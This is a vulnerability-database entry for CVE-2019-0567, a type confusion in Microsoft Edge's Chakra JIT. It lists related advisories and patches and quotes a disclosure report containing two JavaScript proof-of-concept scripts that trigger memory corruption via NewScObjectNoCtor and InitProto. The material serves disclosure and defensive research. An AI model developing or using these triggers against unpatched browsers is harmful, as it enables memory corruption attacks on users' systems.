| Reporter | Title | Published | Views | Family All 36 |
|---|---|---|---|---|
| Microsoft Edge Chakra - NewScObjectNoCtor or InitProto Type Confusion Exploit | 20 Jan 201900:00 | – | zdt | |
| CVE-2019-0567 | 9 Jan 201914:53 | – | circl | |
| Microsoft Edge Chakra Scripting Engine Remote Memory Corruption Vulnerability (CNVD-2019-00761) | 9 Jan 201900:00 | – | cnvd | |
| Microsoft Edge Chakra Scripting Engine Memory Corruption (CVE-2019-0567) | 8 Jan 201900:00 | – | checkpoint_advisories | |
| CVE-2019-0567 | 8 Jan 201921:00 | – | cve | |
| CVE-2019-0567 | 8 Jan 201921:00 | – | cvelist | |
| ChakraCore RCE Vulnerability | 13 May 202201:21 | – | github | |
| January 8, 2019—KB4480116 (OS Build 17763.253) | 8 Jan 201908:00 | – | mskb | |
| January 8, 2019—KB4480961 (OS Build 14393.2724) | 8 Jan 201908:00 | – | mskb | |
| January 8, 2019—KB4480962 (OS Build 10240.18094) | 8 Jan 201908:00 | – | mskb |
`Microsoft Edge: Chakra: JIT: Type confusion via NewScObjectNoCtor or InitProto
CVE-2019-0567
NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but actually they can have via the SetIsPrototype method of the type handler that can cause transition to a new type. This can lead to type confusion in the JITed code.
In the PoC, it overwrites the pointer to property slots with 0x1000000001234.
PoC for NewScObjectNoCtor:
function cons() {
}
function opt(o, value) {
o.b = 1;
new cons();
o.a = value;
}
function main() {
for (let i = 0; i < 2000; i++) {
cons.prototype = {};
let o = {a: 1, b: 2};
opt(o, {});
}
let o = {a: 1, b: 2};
cons.prototype = o;
opt(o, 0x1234);
print(o.a);
}
main();
PoC for InitProto:
function opt(o, proto, value) {
o.b = 1;
let tmp = {__proto__: proto};
o.a = value;
}
function main() {
for (let i = 0; i < 2000; i++) {
let o = {a: 1, b: 2};
opt(o, {}, {});
}
let o = {a: 1, b: 2};
opt(o, o, 0x1234);
print(o.a);
}
main();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
Found by: lokihardt
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation